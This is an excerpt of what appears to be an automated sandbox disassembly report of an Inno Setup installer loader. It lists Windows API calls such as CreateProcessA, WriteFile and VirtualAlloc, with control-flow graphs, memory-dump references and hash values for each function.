                                                                                                              • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000), ref: 00409A28
                                                                                                              • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                              • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90), ref: 00409A5C
                                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                            • 73A25CF0.USER32(0001043A,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                            • API String ID: 978128352-3001827809
                                                                                                            • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                            • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                                            • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                            • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90,00000000), ref: 00409A28
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C4C,00409A90), ref: 00409A5C
                                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C4C), ref: 0040966C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                            • String ID: D
                                                                                                            • API String ID: 3356880605-2746444292
                                                                                                            • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                            • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                                            • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                            • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: .tmp$y@
                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                            • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                            • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                                            • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                            • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: .tmp$y@
                                                                                                            • API String ID: 2030045667-2396523267
                                                                                                            • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                            • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                                            • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                            • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID: .tmp
                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                            • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                            • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                                            • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                            • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 327 407787 324->327 328 4077f9 324->328 325->326 330 407700-407704 326->330 331 4076f4-4076fb call 4073ec 326->331 332 40778a-40778f 327->332 333 4077fd-407802 327->333 334 40783b-40783d 328->334 335 4077fb 328->335 331->330 339 407803-407819 332->339 341 407791-407792 332->341 333->339 337 407841-407843 334->337 335->333 340 40785b-40785c 337->340 339->340 349 40781b 339->349 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 359 407820-407823 343->359 360 407890-407893 343->360 348 4077b5 344->348 351 407743 344->351 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 357 407746-407747 351->357 358 4077b9 351->358 353->358 354->328 355->359 357->321 361 4077bb-4077cd 357->361 358->361 363 407898 359->363 364 407824 359->364 360->363 361->337 365 4077cf-4077d4 361->365 368 40789a 363->368 364->368 369 407825 364->369 365->334 374 4077d6-4077de 365->374 367->366 367->367 371 40789f 368->371 372 407896-407897 369->372 373 407826-40782d 369->373 375 4078a1 371->375 372->363 373->375 376 40782f 373->376 374->324 384 4077e0 374->384 378 4078a3 375->378 379 4078ac 375->379 380 407832-407833 376->380 381 4078a5-4078aa 376->381 378->381 383 4078ae-4078af 379->383 380->334 380->355 381->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                            • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                            • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                            • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2987862817-0
                                                                                                            • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                            • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                            • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                            • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156039329-0
                                                                                                            • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                            • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                            • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                            • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1948546556-0
                                                                                                            • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                            • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                            • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                            • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156039329-0
                                                                                                            • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                            • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                            • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                            • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2087232378-0
                                                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                            APIs
                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                              • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                              • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1658689577-0
                                                                                                            • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                            • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                            • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                            • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                            • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                            • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                            • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                            • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                            • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                            • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                            • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                            • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                              • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 442123175-0
                                                                                                            • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                            • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                            • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                            • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                            APIs
                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
